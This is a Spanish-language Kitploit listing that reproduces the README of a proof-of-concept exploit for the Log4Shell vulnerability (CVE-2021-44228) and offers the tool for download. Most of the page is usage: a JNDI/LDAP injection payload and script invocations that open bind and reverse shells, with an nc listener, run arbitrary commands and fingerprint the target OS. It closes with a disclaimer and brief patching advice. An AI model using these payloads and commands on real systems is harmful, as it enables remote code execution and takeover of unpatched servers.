Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/thearqsz/cve-2021-44228-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubthearqsz/cve-2021-44228-poc

CVE-2021-44228-PoC

Ver Repositorio
hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44228 PoC

PoC para CVE-2021-44228.

Proyecto creado SOLO CON FINES EDUCATIVOS.

Servidor del exploit

Este proyecto crea dos servidores: http y ldap. Ambos son necesarios para que el exploit funcione. El archivo java especificado se compila y los servidores se inician en el Dockerfile. El payload se muestra al usuario; debe pasarse a la aplicación vulnerable.

Payload de ejemplo:

root@kitploit:~
${jndi:ldap//127.0.0.1:1389/a}

¿Cómo ejecutarlo?

  • Shell enlazada
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e bind --remote-port 4445
  • Shell inversa
root@kitploit:~
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e reverse --listener-port 4444
  • RCE
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e rce --cmd 'ls | tee log.txt'
  • Detección de vulnerabilidad basada en tiempo

Hace que el programa se detenga durante 25 segundos

root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e vulndetect
  • Detección de sistema operativo
root@kitploit:~
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e osdetect --listener-port 4444

La detección de sistema operativo puede devolver 4 letras:

  • L para Linux
  • W para Windows
  • M para MacOS
  • U para desconocido

Bypass

Se publicó una técnica de bypass. Ejemplo aquí

Aplicación vulnerable

La aplicación fue diseñada para mostrar cómo funciona. Para compilar y ejecutar el jar con una aplicación usa:

root@kitploit:~
./build_vuln_app.sh
java -jar vulnapp/target/vulnapp.jar 'PAYLOAD'

donde PAYLOAD es lo que devuelve el script ./poc.sh (p. ej. ${jndi:ldap://127.0.0.1:1389/1}).

Créditos

Algunos créditos para proyectos y sitios web que se usaron durante la creación de este exploit:

  • https://github.com/shanfenglan/apache_log4j_poc
  • https://github.com/ivan-sincek/java-reverse-tcp
  • https://www.lunasec.io/docs/blog/log4j-zero-day/
  • https://github.com/RandomRobbieBF/marshalsec-jar

¿Cómo protegerte?

Inicia la aplicación usando log4j con log4j2.formatMsgNoLookups establecido en true, o actualiza a log4j-2.15.0-rc1 o posterior. Las actualizaciones ya están disponibles; impleméntalas lo antes posible.

Descargo de responsabilidad

Este proyecto solo puede usarse con fines educativos. Usar este software contra sistemas objetivo sin permiso previo es ilegal, y el autor no será responsable de los daños derivados del mal uso de este software.

Descargar herramienta